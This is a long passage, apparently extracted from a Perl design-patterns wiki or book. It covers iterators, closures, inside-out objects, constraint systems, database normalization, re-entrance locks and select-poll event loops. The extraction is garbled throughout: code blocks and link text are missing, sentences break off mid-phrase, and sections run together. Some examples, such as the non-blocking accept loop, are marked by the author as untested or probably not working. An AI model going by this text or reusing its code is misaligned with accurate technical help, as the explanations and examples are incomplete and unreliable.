interface. XXX virtual machine as an interpreter operating on a series of command objects, See Also Synopsis: Create a unified interface for iterating through data items. hen: You have objects that contain sets of things, or you have objects that are arranged into structures. Symptoms: Each package has a slightly different way to look through data items it contains. This is a specific example of a general idea: if there is a kind of thing that needs done, create an abstract class (a package that has only empty methods) that outlines a general interface for doing it. In this case, we're concerned about looping through a collection of values:. This is a simple case. If an object doesn't directly contain the values, but instead references a network of items, we can recurse over them. This can be wrapped in an Iterator interface. [21]! Iteratoring through data sets which your object contains or which other objects contain is all fine and dandy, but this same interface gives us everything we need to iterator over data sets that don't exist at all, except perhaps in our imagination. The things we iterate over could be things that we know to exist from theory, like prime numbers. Computing things from a large set as they are needed, rather than beforehand, is called. lets you set up pipelines where different parts of the program do operations on data as it is generated or read. Contrast this with the typical Perl approach of slurping everything into memory, then working on it: #. The second example above, rewritten as a provider:. Iterating and Overloading Perl overloads the "++" operator to iterator strings through a useful realm of values: $a = "aaa"; $a++; print $a, "\n"; # prints "aab" See "OverloadOperators" in OverloadOperators for how to create constructs like this yourself in Perl according to this formula: XXX - an exmample of exactly this would be really nice Sieve of Eratosthenes - implemented in Python. A Perl version would be a nice example for Perl iterators. See Also,, Generally, create things where it makes sense to, and pass them down constructors, leaving contained objects to do with them what they wish, rather than making assumptions about their structure. Given an A that creates a B, and B needs a C that only A can create, create C, pass it to A's constructor, and let A pass it to B itself, rather than trying to take charge and set up all of the relationships yourself. Extension of idea of encapsulation.,, See Also Synopsis: Want to use several modules across a collection of scripts, but don't want dozens of "use" lines at the top of each. There is incentive not to split up bloated modules due to the need to go through and edit all of the scripts to use each new module-spawn. This also has all of the markings of a problem that resurfaces: should you refactor again, you'll be changing all of your modules. Leaving everything in one module is tempting. In days of lore, Perl programmers would require a single config.pl that set up variables and requireed other modules for them. use doesn't automatically preclude this - merely leave off the package statement, and you'll continue operating in the namespace of the program that used your module. For example, in config.pm: #., See Also External Pages Linking to This Page: Problem Perl's programming interface sucks. "InstanceVariables" in InstanceVariables are slow to access, and require a special syntax that is unsightly and prevents easily converting procedural code to OO code. Subclass data can clobber superclass instance data unless manually prefixed with the class name. Or, you just want to integrate the style with the programming style to harness their respective strengths. Solution Mix and styles to deal with the ugliness of Perl's "InstanceVariables" in InstanceVariables syntax, write more concise program, and use scopes for implicit data flow rather than manually passing to and reading from constructors.'s concept of automatically binding code to a perticular variable created at a perticular style is ease of doing things like "InnerClasses" in); The string "color" appears ten times. Ten! In Perl, no less. If I wrote out the constructors for the other arguments, this would be repeated for each variable. Shame. If we trust the user to pass in the right things to the constructor, we can get rid of two. Still, even typing each thing eight times is begging for a typo to come rain on your parade. If you're a LISP or Scheme programmer, you wouldn't even consider writing an autocracy like this. You'd probably write something like:"; First, the { query_name = sub { } }->{$arg}->(@_)> is a sort of switch/case statement. It creates an anonymous hash of names to functions, then looks up one of the functions by name, using the first argument passed in. Once we have that code reference, we execute it and pass it our unused arguments. Then we've added a default case to it, so we don't try to execute undef as code. This could have been coded using if/elsif/else just as easily.: Lexically Defined Object: There is one little mystery left, though. Code references are dereferenced using the $ref-(@args)> syntax. $ref-function(@args)> syntax is reserved for objects. We shouldn't be able to call $ob->get_street() in our example on a code reference -- unless that code reference has been blessed into a package. It just so happens that that is exactly what MessageMethod does. package MessageMethod; sub new { my $type = shift; return $type->new(@_) if ref $type eq __PACKAGE__; my $ref = shift; ref $ref eq 'CODE' or die; bless $ref, $type; } sub AUTOLOAD { my $me = shift; (my $method) = $AUTOLOAD =~ m/::(.*)$/; return undef if $method eq 'DESTROY'; return wantarray ? ($me->($method, @_)) : scalar $me->($method, @_); } 1; Given a code reference, MessageMethod blesses it into its own package. There are no methods aside from new() and AUTOLOAD(). AUTOLOAD() handles undefined methods for Perl, and since there are no methods, it handles all of them. (There is an exception to that, where new() has to pass off requests). AUTOLOAD() merely takes the name of the function it is standing in for and sends that as the first argument to a call to the code reference, along with the rest of the arguments. We're translating $ob-foo('bar')> into $ob-('foo', 'bar')>. This does nothing but let us decorate our code reference with a nice OO style syntax. paradigm, but" in InstanceVariables. We need private storage for the code references and the anonymous version of the sub statement. We need hashclosure.pm. # place this code in hashclosure.pm # tell Perl how to find methods in this object - run the lambda closures the object contains sub AUTOLOAD { (my $method) = $AUTOLOAD =~ m/::(.*)$/; return if $method eq 'DESTROY'; our $this = shift; if(! exists $this->{$method}) { my $super = "SUPER::$method"; return $this->$super(@_); } $this->{$method}->(@_); } 1; This code translates method calls into invocations of anonymous subroutines by the same name inside of a blessed hash: when a method is called, we look for a hash element of that name, and if we find it, we execute it as a code reference. The flow of control goes something like: /\/\/\/\ graph: { title: "Dispatch Order" color: lightcyan manhattan_edges: yes edge.color: lilac scale: 90 node: { title:"A" label: "$foo = new Foo(); \n$foo->bar();" } node: { title:"A1" label: "Foo::new()" } node: { title:"B" label: "Foo::AUTOLOAD()" } node: { title:"C" label: "$foo->{'bar'}->() runs" } edge: { sourcename:"A" targetname:"A1" anchor: 1} edge: { sourcename:"A" targetname:"B" anchor: 2} edge: { sourcename:"B" targetname:"C" } } /\/\/\/\ Dropping the above code verbatum into a .pm file it doesn't change package (there is no package statement), so it defines an AUTOLOAD() method for the current package. This is a "WrapperModule" in WrapperModule of sorts. and our AUTOLOAD() method work together to provide easy access to $this and "InstanceVariables" in InstanceVariables. We can use object instance specific field variables directly without having to dereference a hash. package Foo;" in acheive, and the least work on my part, and the least chance of error. CPAN class Package In other news, "PerlMonks" in PerlMonks:116725 defines a class package usable as such: my $class = new class sub{ my $field = shift; $this->field = $field; $this->arrayref = [1,2,3]; $this->hashref = {a => b, c => d}; $this->method = sub{ return $this->field }; }; ...allowing the anonymous, inline construction of classes. Abagail's Inside-Out Objects Qouting Abagail: package BaseballPlayer::Pitcher; { use vars '@ISA'; @ISA = 'BaseballPlayer'; my (%ERA, %Strikeouts); sub ERA : lvalue {$ERA {+shift}} sub Strikeouts : lvalue {$Strikeouts {+shift}} sub DESTROY { my $self = shift; delete $ERA {$self}, $Strikeouts {$self} } } Taking this apart, lexical data is used instead of nametable variables, which doesn't seem to make any difference. Rather than indexing the blessed reference by a constant field name to come up with a per-object, per-field storage slot, one of these lexicals is indexed by the stringified object reference. See "PerlMonks" in PerlMonks:178518 for more Categories See Also Problem: Difficult to solve problem. All of the related logic is huge and no control structure or organisation seems to be adequate. Solution: Model the problem using connectors and logic items. Let scenarios play themselves out recursively across the network. This rather large example was adapted from code in, an excellent book. The program was originally written in Scheme, the languaged featured in Structure and Interpretation. Even if you write nothing but Perl, C or Java all of your life, I highly recommend this book. Decomposing problems into functions is the first cautious step in learning to program; decomposing programs into objects could be seen as a second and factoring out the recursive nature of complex problems a third. Complexity is the program killer, and its management is paramount in scaling programs as well as solving problems. In addition to adopting the example to Perl, I've adopted it to use objects rather than lambda closures. This made the code longer and less elegant, but verbose borish implementation is considered a virtue in this day and age. Constrain::new() is a wee little factory that spits out subtypes on demand. We're not actually using this right now in our code because by the time we got to the bottom of the file we forgot that we had done that. Using a factory as such is a good policy: it adds a layer of abstraction in the creation of objects, and each layer of abstraction is insurance against change, giving us a single place where we can translate the old interface to whatever is new. Constrain::Adder is our first and only serious logic componenet. It should be refactored into a base class with a and a sample implementation. Perhaps I'll get around to this later XXX, as it would make this code more directly useful to random purposes. When told what its value should be, it lashes back, sending a message out on one of its connectors informing the objects on that connector what value they must have to satisfy the condition. The Adder object does whatever it must to satisfy the constraint. The three inputs are identical in that they are all connections that may be connected to any other logic devices. They differ in that the last will be the sum of the first two. If any single inputs value is unspecified, a value will be sent out on that connector. If all values are specified after a new value comes in, the last output is the one we force to fit the constraint. Should it not wish to do so, it may in turn push out a new value by calling setvalue() on the connector. Eventually, a solution that all nodes are happy with will be arrived at, or else every possibility will be exhausted. XXX, return failure should we be unable to arrive at a solution. This component has exactly three connections. Constrain::Probe describes an object that merely repeats to the screen any value it is told to have. This componenet has exactly one connection. Constrain::Constant asserts a value on the wire and refuses to accept any other value. Should it be told to be another value, it fights back, pushing its own value back out again. This componenet has exactly one connection. Finally, Constrain::Connector isn't a logical component at all - just a wire or messenger between them. It has no behavior of its own other than to relay messages from one connection out on the other connections. The above components each have a fixed number of inputs - not so with a connector. A connector may be connected to any number of components. ( Protocol)? XXX- constraint system example - traffic lights XXX- constraint system with tied variables... $tempcelcius = 100; print $tempfarenheight;, See Also Problem: Functionality doesn't exist in a class, but should. Subclassing to add the functionality isn't appropriate - the features are needed in all existing objects retroactively. Solution: Change over to its package temproarily to define some new methods in the existing package. Scenarios Examples *{'ExistingPackage::new_function} = sub { # new accessor }; sub ExistingPackage::new_function { # new accessor }; Any object created from ExistingPackage will instantly have a method, new_function(), after this code is run. Both examples do essentially the same thing. The first is uglier, but allows closures to be taken. Perl still considers the new function to be the package it was defined in [25]. This means that we can't use lexical data that was in scope when ExistingPackage was originally created, nor can we use UseVars and OurVariables that exist in ExistingPackage. Examples exist of using lexically scoped my variables for the purpose of keeping people away from your data. While not completely fool proof, it does make it inconvinient. UseVars and OurVariables are easier. sub ExistingPackage::new_function { my $self = shift; local *existing_var = \${ref($self) . '::existing_var'}; # code here that uses $existing_var freely, as if it were in # out package scope. $existing_var++; } The local *glob = selfref idioms is, well, ugly. We compute the name of the variable - find the package that $self was blessed into, concatonated with "::existing_var", and then used as a soft reference. A reference is then taken to that soft reference using the backslash operator. See. local $ExistingPackage::new_variable; $new_variable will be static - individual objects won't have their own copy. See "StaticVariables" in StaticVariables. This is usually not the desired result. To add, and initialize, a new variable to each instance of objects from this package, redefine the constructor, new(), before any objects are made from it: do { my $oldnew = \&ExistingPackage::new; *ExistingPackage::new = sub { my $self = $oldnew->(@_); $self->{new_variable} = compute_value(); $self; }; }; This defines a new() routine in ExistingPackage that invokes the old new() routine using the reference we saved in $oldnew. This reference is passed all of the arguments given to the replacement new() routine. This assumes that the datastructure underlieing objects defined by ExistingPackage is a hash reference: $self-{new_variable}> would need to be changed to something similar to $self-[num]> if it were an array. compute_value() is a place holder for whatever logic you really want to do. We insert this value forcefully, disreguarding. Finally, we return the modified $self. The return operator breaks the tieing on perl 5.6.1 and perhaps later, so we just let the last value of the block fall through. Use the x = sub { } version of sub: it waits until run time to return the code reference, allowing a closure to be taken. See. We're taking a closure on $oldnew, in this example: we have to wait to bind to this variable until the specific instance of that variable we want has been created. This is being done in side of a do { } block so as not to pollute our lexical context with variables that don't need to be in our scope. See. Example: B::Generate - [26] See Also Its useful to borrow the idea of relationships from Relational Database Management Systems (relational databases). In fact, many large enterprise applications are actually collections of specialized applications all built around one large data warehouse. Records in the database are represented in software by objects. These objects can be queried for things they related to: other objects representing records.. - design patterns of objects and relational database systems is actually somewhat interesting, and begins to touch on the idea of data cubes - flattening and restoring hyperdimentional data structures into two dimentions. is prevelent, though not insightful, and should be illustrated here in depth. It ties in with, too. If a relational database and an object system each match up part to part - table for class - the object system will work through normal delegation and composition. The database will also "just work", though newbies will need to learn how to write large-ish queries that do lots of outter joins. Detecting NULL for key fields replaces ->can(), or is used when constructing queries that build systems of objects, and ->can()/->isa() information is needed. This gets into datacube stuff, too.,, See Also Problem: Reporting on a database with only one table, or a self-referential data structure. Solution: Use relational database capabilities to join anyway, joining the data to itself, write queries to normalize the data [29], or refactor the database. For datastructures, use loops, temporarily hashes, and to make sense of the data [30]. "SelfJoiningData" in SelfJoiningData refers to data not spread across objects or tables or different types. Instead, everything is of the same type or in the same table, and this data forms a web of internal references. Sometimes powerful, usually applied incorrectly. In the database world, refered to as "non-normalized" or "flat". When relational data isn't normalized, you get something like: select self1 as foo, self2 as bar from self as self1, self as self2 where self1.name = self2.param Note how the table self is being joined against the table self. This is where the name comes from. Or something like: foreach my $i (keys %hash) { if(exists $hash{$i} and exists $hash{$hash{$i}}) { push @results, [$i, $hash{i}, $hash{$hash{$i}}]; } } Ugly, slow, crude, effective. People have been known to write code generators and SQL generators when faced with degenerate cases like these that automate ugliness production. I guess you could categories this as an in the form of a. The more fields you want back from the database, the more times you have to self-join the data. Pretend you have a database that stores form submits. forms has one record per post, but since an HTML form has any number of name-attribute pairs, several entries in parameters reference the entry in forms for any given post. Given a formid, we want to extract a few named parameters: "email", "name", and "gender": select p1.value as email, p2.value as name, p3.value as gender from form parameters as p1, parameters as p2, parameters as p3 where form.formid = ? and p1.formid = form.formid and p1.name = 'email' and p2.formid = form.formid and p2.name = 'name' and p3.formid = form.formid and p3.name = 'gender' Each additional field requires 4 additional lines in our query. If we were joining the additional tables in, it would take 2: select emails.email as email, names.name as name, genders.gender as gender from forms, emails, names, genders where forms.formid = ? and forms.nameid = names.nameid and forms.emailid = emails.emailid and forms.genderid = gender.genderid Obviously, lumping everything in one table would simplify further in this case, and in this case would be perfectly acceptable. When not all of the columns describe the primary key and only the primary key, the database design degenerates. "SelfJoiningData" in SelfJoiningData usually comes about as a means to cope with trying to report on such degenerate databases. Simply, different kinds of things should be placed in different tables. The structure (which table references which IDs in which other tables) shows the relationship between the different kinds of things. One to many relationships require two tables; many to many relationships require three. Datastructures Solutions: XXX this place is a placeholder. You can fix it up yourself, or you can wait for me to do it. If you are here expecting a finished version of something, stick to and don't wander off the path. <TakeFive> Juerd: I think I'm going to go with multiple tables after all. It will save me headaches in the future. And I can pull them (assuming the 'header' record is in %h) with: "select value from $h{datatype} where id = $h{id} order by sequence" <Juerd> subqueries, subqueries, subqueries, joins. subqueries, subqueries, subqueries, joins. <TakeFive> :) <Juerd> Ideally, you don't use a query just to have enough information to do the next <scrottie> Except for meta applications like database admins, usually you don't want a variable table name. <Juerd> That is correct. Same goes for column names. <Juerd> TakeFive: Think symbolic references <scrottie> If all of your things are of essentially of the same type, put atleast the parts of them that describe the primary key in one table. You can always OutterJoin a lot of other tables, so you get kind of an ObjectOriented like thing going on - everything "is a" foo, but you have some MixIns going on as well. Not that MixIns are encouraged in OO, but it is kind of the same idea. <TakeFive> scrottie: the problem is (going back to the oceanographic implementation) right now, with the dataset I have, all the actual data is floating point numbers -- <scrottie> i've always said we should dump our problems in the ocean =) <TakeFive> salinities, depths, current speeds and such. but now i've been told i need to support character fields, latitude/longitude pairs, and timestamps, and ultimately, I'll need to be able to generate pictures of buoys as they float, or purely text output. If I use a single table, I'll always have to check what kind of data I have. <scrottie> n:1 relationships break out into another table, so if you have a bunch of buoys for one given primary record (what is the primary record anyway?), then throw them all in another table. If you have an arbitrary number of other things of types that you can't anticipate, you could promote everything to the same object type and allow recurisve references between objects ;) Perlers tend to write databases like that... like perlmonks's codebase... but it is best not to talk of such things <Juerd> It's called Everything <scrottie> If you have a lot of different things, you can set up an attribute-value pairs table. Think of HTML forms. Someone posts a form. That gets a record in a Posts table, lets say. it has a bunch of name value pairs. Each of those gets a record in the Attribute table, where each record references the Posts table entry. <TakeFive> scrottie: ah, add a column like: "datatype" for each record. <scrottie> Yeah. You lose the ability to cleanly join at that point - everything is nested subqueries with another self-join for each (lag) record you want from Attributes. ugly. So, that way is sometimes - seldom but sometimes - better. <Juerd> subqueries, subqueries, subqueries, joins. <scrottie> Well, the value in the attribute-value pair will always be the largest thing - if you're holding binary data, it will be a blob. Few databases index blobs. <scrottie> You probably don't want SelfJoiningData, and you don't want to promote all records to the same type. That leaves creating a lot of tables, one for each type of thing, and doing a lot of joins and OutterJoins. It kind of sucks, but it is powerful, and a lot less ugly in the end than any alternative. The relation between tables is based purely on references between fields. Never list table names in a database as a means of creating references. Juerd is right. Use lots of joins and subqueries to pull your data together from multiple different tables. As Juerd says, ideally, you should get your result in one query. Use only IDs in auxiliary tables or. You can easily create more auxiliary tables and reference the primary table from them. Only queries that want this information will know about and know to ask for it to be joined in. [31] See Also,, Individual people each having a distinct set of traits can be expressed cleanly with three tables. Any fewer would lead to "SelfJoiningData" in SelfJoiningData and an ever increasing number of columns holding primary, secondard, trinary, and so on indefinately, positional attributes, which can only be used in queries with great pain and modifications each time a new slot is added. Any more tables leads to the same problem, but with constant introduction of tables rather than attributes. The People table exists exactly as expected: a list of people, with columns for things that each and every person has. All attribute tables need to be generalized into one. Any further attribute specific data may to the Attribute table but should not be included in the attribute table itself: only the columns which describe the each and every attribute and nothing else. Normalize the People table so that AttributeIDs don't exist in it. The rules of normalization state that any time we're attempting to hold an array of data in one record, we really want a 3rd independent table. This is exactly what we need to do. People contains PeopleID. Attribute contains AttributeID. PeopleToAttribute contains one PeopleID and one AttributeID per record. Each PeopleID may occur any number of times, and each AttributeID may occur any numbers of times, and these may occur in any combination. PeopleToAttribute is a hinge table. Hinge tables can and should contain data specific to the combination of the two IDs. Badly designed databases often require repeated application of this concept. A database may list wholesale and retail prices, primary product category, and secondary category, should be turned into a table listing Products, one listing Category, one listing PriceOption, and two hinge tables. ProductToCategory shows the membership of each produce in each category by virtue of having a record making the connection: select count(*) as isDongle from Product, Category, ProductToCategory where Product.ProductID = ProductToCategory.ProductID and ProductToCategory.CategoryID = Category.CategoryID and Category.Name = 'Dongle' This query returns the number of dongles in the database. Replacing count(*) with a specific field list would return details of each dongle. PriceOption contains records "Wholesale" and "Retail", but cannot contain the actual prices. Attempting to do so would be no better than putting the prices directly into Product. ProductToPriceOption not only connects Product to the pricing options available for it as listed in PriceOption, but for each pricing option, contains the actual price. Normalization dictates that each and every column in a table depend (that is, be specific to) the key, the entire key, and nothing but the key. The price depends on more than ProductID in Product because it also depends on PriceOptionID in PriceOption. Likewise, it does not depend on just PriceOptionID, but also ProductID. ProductToPriceOption is keyed by both PriceOptionID and ProductID, so each record it contains is specific to both values. 3.95 may be the Retail price for "The Moon is a Harsh Mistress". Understanding object relationships is impossible without understanding the rules of data normalization. Failing to do so so will result in obnoxiously complex object structures with no apparent solution for making sense of them. It is critical to deciding when to create objects, and where to place data in them. See Also:,, "SelfJoiningData" in SelfJoiningData,, One to many relationships become many to many as original design assumptions are relaxed. This lets us model more complex situations. Objects that contained one instance of a kind of another object may find themselves holding an array. Methods that operated on this object explicitly now need to be told which one to operate on. Defining an iterator and moving the interface to the iterator lets us keep our concept of one and only object, but adds the concept of moving to the next object in the list. Places where the single object was implicitly manipulated need only be wrapped in a loop. See also: "IteratorInterface" in IteratorInterface, "CompositePattern" in CompositePattern, "ObjectsAndRelationalDatabaseSystems" in ObjectsAndRelationalDatabaseSystems, "BiDirectionalRelationshipToUnidirectional" in BiDirectionalRelationshipToUnidirectional See also: UML, SQL, Problem: Relationship between objects is confusing. Responsbility is ambigious, or calls bounce back and forth. Solution: Apply, "InnerClasses" in InnerClasses,, or a "ConstraintSystem" in ConstraintSystem as necessary. In it's most basic form: my $output = new Output; my $backend = new Backend($output); $output->set_backend($backend); Or: my $output = new Output($this); Refactor as a: Should $output know about $backend or $this? Does it make sense for $backend to place a call into $output that requires a call back into $output? WholeObject Contention for data of exactly this sort is a strong hint at a refactoring: move the data that is of common interest into a and passed whole, negating the need for a callback. See, "PassingState" in PassingState, InnerClasses Using "InnerClasses" in InnerClasses, the parent class need not have its API burdoned with the special needs and interfaces of its child, and the scope of the circular reference can be greatly reduced. An object created inside of the parent object, attached to its lexical data, can be sent off in place of $this. my $output = new Output; my $backend = new Backend($output->get_backend_adapter()); $output->set_backend($backend->get_output_adapter()); Or... my $output = new Output($this->get_output_adapter()); ModelViewController As says, books don't shelve themselves, nor do shelves put the books on them, but there must exist a librarian. Considering mapping the problem as a. This is more of interest to dealing with too much complexity in the logic rather than too much complexity in the code. ConstraintSystem An odd web of objects that participate in group-think is unavoidable or desireable. Bite the bullet and do it right. See "ConstraintSystem" in ConstraintSystem. Resources See Also, When adding and removing arguments, it can be difficult to remember the order you wanted them in. Using a hash, you can do away with arbitrary ordering.'; } See Also Synopsis: The arguments to the first function are augmented and repased to the next function, possibly recursively. When: Context is built up during evaluation, and this context utliamtely turns into the result. Recursive code that details with a variable set of variables. In place of code that uses $$var to directly access the symbol table.. See Also Synopsis: Creating a custom compliment of code cleans crufty object access syntax. When: Your code is bloating due to another cumbersome interface. teaches that no language will be well suited to every problem, so the best language is one that is well suited to creating languages for expression solutions in general. Huh? Instead of attaching the problem head on, step back and formulate a plan involving intermediate steps to the goal. We've designed data structures using objects. We've engineered programs using objects as building blocks. Whens the last time we've designed a language to solve a problem? Any language lets you create functions, but Forth lets you create functions that create other functions (Forth calls functions "words"). We don't need to cook up a VM and a syntax to do this, though we could. Perl's VM and syntax will work. This is kind of a like an Abstract Factory. Objects certainly give you a way to generalize a solution, but they don't give you a mechanism to express a solution. If the solution involves making lots of method calls, the algorithm can get swamped down in OO syntax to the point where it is hidden. Removing the excess syntax is one way of refactoring code. Everyone benefits from the clarity, especially when you're trying to formulate a language as an intermediate step to solving a tough problem. Lets take template processing as an example. Lets say you've got various sorts of templates: templates representing HTML fragments, templates representing email templates, database queries, and so on. You could create objects to represent each type of thing, and give each a stringify() method that requires a hash argument of values to template in. You would then write a huge amount of code, mostly method calls, loops, and string concatenations. Or... XXX untested code.: #: createtemplate() is a simple example. createquery() is more advanced. A simple example appeared in Chapter XXX 3 where we created accessors for ourself. For any task that is suited our mini language, we've completely factored out several tedious syntactical things. We're now free to work in a very concise, expressive, short-hand language. Yet, we still have all of the power of Perl available - we haven't given up anything. The key elements are: The returned code reference is lexically bound to the data you passed to it. The data passed to it could be any datatype, including objects, scalars, and most importantly, code references. Logic is factored out of the main program into the inner part of the "create" routine, inside of the anonymous subroutine block. Creating a symbol table entry (assigning the anonymous subroutine to a glob of the given name) is optional. This skip can be stepped and done manually if you find yourself mostly creating functions to pass to other functions: print createquery($readnumberbystatesql, {drawpiechart => createpiechart() }, 'drawpiechart'); It is traditional in languages like Lisp and Scheme to skip naming things unless actually necessary. Next time you're getting bogged down in syntax, ask yourself if a function generator could be written that would take care of the tedious busy work. See Also Die early, die often, get closer to the root of the problem. Don't let an error in one part of the program trigger problems much later in a distant, unrelated part of the program. Check arguments types, provide accessors to enforce policies and handle state changes in objects there so that they are responsible for keeping themselves consistent. Have or die $!; appear after each statement whose failure you aren't prepaired to handle otherwise. These clauses should absolutely litter your program. Should something fail unexpectedly, execution will stop at the exact point of failure, and the diagnostic will be fresh and useful. Things that a program assumes it can count on are called invarients. These are the basic assumptions that the program was written under. or die documents these in your code for all to see. People resort to the printed documentation only when they can't figure out the interface for themselves. This applies equally to video games, digital time pieces, and software APIs. Diagnostics are more helpful than the manual, in this sense. This is part of "encapsulation" or "data hiding". Making part of your interface public is committing to support that design indefinately. Don't do this lightly. Sometimes you want your application to die with a useful diagnostic should an invarient by deviated from, for example when you're first installing and configuring an application, or when you're debugging it. Othertimes, you want it to do its absolute best to keep on trucking, for instance when that program is running as a mission critical service. Making no attempt to trap errors acheives the first case. For the second case, wrap eval {} around calls. Where you apply this technique depends on how much recovery logic you're willing to write. The more recovery logic, the closer the protective eval {} can be to the possible failure points. Less recovery logic means that fewer eval {} statements are needed. eval { run_query(); }; if($@) { $dbh = DBI->connect("DBI:Pg:dbname=blog;host=localhost;port=5432", 'scott', 'foo'); run_query(); } See Also Code and data, time and space, lo... What follows is a rant on the nature of programs. While not suitable for consuption in any format, it is a thought I need to develop further, as it affects every explaination in this text. Some declarations run as they are encountered; some affect future behavior. Run time programing modification - self modifying code - is an example of affecting future behavior; so are lambda closures and object instantiations. Some languages are purely sequential: C. Some are purely declarative: Ocaml. For many people, datastructures are seen as influencing future behavior only, likewise code is always seen as executing immediately. Tied data, for example in our, and using object accessors to fetch and stow data give datastructures the property of executing immediately. Changing the implementation on the fly by using the polymorphic nature of objects makes linear comprehension of code impossible. So do lambda closures. See Also:, "FunctionalProgramming" in FunctionalProgramming, "AbstractFactory" in AbstractFactory,,,, External Pages Linking to This Page: Problem: Work is handled through recursion or delegation. Sometimes it is delegated back, or recursion never terminates due to a problem out of our control. Solution: Use a re-entrance lock to detect and gracefully handle the situation. Set the lock on entrance and clear it on exit.". In yet another case, the one illustrated above, we're flatly denying recursion. If one node responds to events of type "A" with events of type "B", and another node responds to events of type "B" with events of type "A", and we did no reentry checking, Perl would explode. It would use up all of the memory the OS would allow it, grind away for a while, blow up like a big grinding balloon, and just pop. Nobody wants that. Putting rules in place for which events may be replied to with another event will prevent this situation as well. If you do opt for policy, you may elect to put some limits in place for testing purposes. These kind of arbitrary limits can never be set correctly: what you consider an impossibly large value becomes unworkably small in a few years. For debugging, detecting what looks like a run away condition can be a life saver:(@_); } } Recursion and Locking on User Data Recursing through user data. Sends chills up your spine, doesn't it? User data is notorious for kiniving, minipulation, and being just plain old abusive, contreived rubbish. Why do users write HTML files that include a second HTML file that includes the first? To piss you off, thats why. # expand includes in HTML templates # eg, my $numfound; FOUNDSOME: $numfound = 0; $tmpl =~ s{}{ die "invalid include path: '$2'" if $2 =~ m{\/\.\./\/}; open my $f, "$inputdir/$2" or die "include not found: $inputdir/$2 $!"; read $f, my $repl, -s $f; close $f; $numfound++; return $repl; }gie; goto FOUNDSOME if($numfound); This would run indefinately (if permitted by the universe) if a user tried the A includes B, B includes A attack. Preventing reentry into some method wouldn't work. If we created a method, we would need to be able to reenter it to include more than one file deep. Of course, we could make it non-recursive, but it wouldn't do. Things that seem like they should work, don't. Limiting the stack depth is another option, but it is a violation of the "BusySpin" in BusySpin antipattern: no correct value can possibly be chosen that is large enough for extreme, but valid cases, but too small to shut out denial of service attacks. Someone fetching a malicious construct over and over will easily take the server out. Refusing to include the same page twice would also fail to do, and would throw cold water on most template arrangements that sites actually, really use. It is, however, simple to implement. Limiting the number of times that a single file may be included helps but the breaks on things, but violates the above pragmas concerning "BusySpin" in BusySpin as well: my $numfound; my %done; # added this FOUNDSOME: $numfound = 0; $tmpl =~ s{}{ die "invalid include path: '$2'" if $2 =~ m{\/\.\./\/}; die "file '$2' included entirely too many times" if $done{$2}++ > 30; # added this open my $f, "$inputdir/$2" or die "include not found: $inputdir/$2 $!"; read $f, my $repl, -s $f; close $f; $numfound++; return $repl; }gie; goto FOUNDSOME if($numfound); Another solution is to maintain a stack, perhaps a, and continiously examine it for repeated sequences. Such attempts are prone to occurance of a "RaceCondition" in RaceCondition, and there is usually an upper limit on how large of the stack segment it will compare to the rest of the stack. For example, if the code only checks for repeated patterns of two through 300 stack frame entries, someone need only create a circulation inclusion attack that 301 pages. D'oh! Correctly solving this problem could be done by computing routes between pages and make a map of which pages include which others. See. This is far too complex for most people to stomache. If you happen to write a solution to this, please, by all means, post it here. It should be a stright forward adaptation of to use the example above. Yes, I'm just too lazy to do it myself right now. is an example of recursion in perl that checks for recursive traps. See Also Stand in for threads. Much more efficient in Unix. Named for the use of select(). A single inner loop waits for either a timeout, signal, or a filehandle to become available for read or write. Coordination of reading and writing and responding to other events is handled in a single, centralized, and often massive central loop. Contrast with threads where each thread has its own loop and blocks waiting for exactly one thing at any given time: an object lock, input, another thread to wake it, and so on. Many systems are built on top of a select() and its style. AWT, the Java builds an facde on top of the event oriented X11 platform on Unix-like hosts. The "SelectPollPattern" in SelectPollPattern is counter-intuitive for most people to use. It requires manual management of the CPU, and each task has to completely return to the inner loop and then be called fresh. [33] my $shbit = 1 << fileno($sh); my $sibit = 1 << fileno($si); my $inbitmask = $shbit | $sibit; # select(readtest, writetest, exceptiontest, max wait) select($inbitmask, undef, undef, 0); if($inbitmask & $shbit) { # $sh is ready for read } if($inbitmask & $sibit) { # $si is ready for read } Done in a loop, several sources of input - perhaps the network, a GUI interface, pipes connected to other processes - could all be managed. The last argument to select() is typically 0 or undef, though it is sometimes other numbers. If it is undef, select() will wait indefinately for input. If it is 0, select() will return immediately, input ready or not. Any other number is a number of seconds to wait, floating point numbers accepted. As soon as a any monitored input or output handle becomes ready, select() will return. select() doesn't return a value in the normal sense: it motifies the bit mask, turning off any bits that correspond to fileno() bit positions that aren't ready. Each bit that we set must be tested to see if it is still on. If it is, that filehandle is ready for read or write. Filehandles that we want to monitor for read are passed as a bitmask in the first argument position of select(). The second argument of select() is the filehandles to monitor for write, and the third, for exceptions. if($inbitmask & $sibit) { $si->process_input(); } Filehandles may be blessed into classes [34], and then methods called to handle the event where input becomes available for read. This is easy to implement, simple, and sane - to implement. Using it is another story. package IO::Network::GnutellaConnection; use base 'IO::Handle'; sub process_input() { my $self = shift; $self->read(...); } Each access must promptly return for other handles to be served. This is a big requirement. Unheaded, a user interface could repeatedly cause network traffic to time out, or one unresponsive process reading on a pipe to lock up the process writing on the pipe - see for more. These cases are more numerous and insideous than thread CPU starvation issues. To effectively cope with not having a return stack of its own, each line of processing associated with an IO handle must take pains to keep track of where it was in its code, what is doing, and what it expects to do next. See "StatePattern" in StatePattern for an implementation of this and more discussion. Non-Blocking I/O Sometimes select() will tell you that an I/O channel is ready to read from, but attempting to read still blocks. Non-blocking I/O can be used as a safety net. When accepting connections on a TCP/IP socket, non-blocking I/O is a must: use Socket; use Fcntl qw(F_GETFL F_SETFL O_NONBLOCK); use POSIX qw(:errno_h :fcntl_h);: $!"; # non blocking listens: fcntl($client, F_SETFL, fcntl($server, F_GETFL, 0) | O_NONBLOCK) or die "fcntl: $!"; while(1) { my $paddr = accept($client, $server); (my $remoteaddress, my $remoteport) = sockaddr_in($paddr); my $remotehostname = gethostbyaddr($iaddr,AF_INET); } XXX - very dubious, could be written cleaner, probably doesn't work. accept() will try to accept a new connection, but it won't wait to do so. It returns immediately, and when //$paddr/ is marked ready for read according to select(), then we know a new connection has actually arrived. This integrates listening for new connections into the select-poll service loop. This code is based on code in "PerlDoc" in PerlDoc:perlipc See Also Problem: Slow updates and corrupt files. Solution: Don't change when you can append updated information, and never leave data in an indeterminate state. package Xfor; sub new { my $pack = shift; my $filecache; # holds all of the name->value pairs for each item in each file my $buffered; # same format: data to write to file yet bless { # open a flatfile database. create it if needed. open => sub { my $fn = $_[0]; unless(-f $fn) { open F, '>>'.$fn or return 0; close F; } $self->openorfail($fn); }, # open a flatfile database. fail if we are unable to open an existing file. openorfail => sub { my $file = shift; # which file the data is 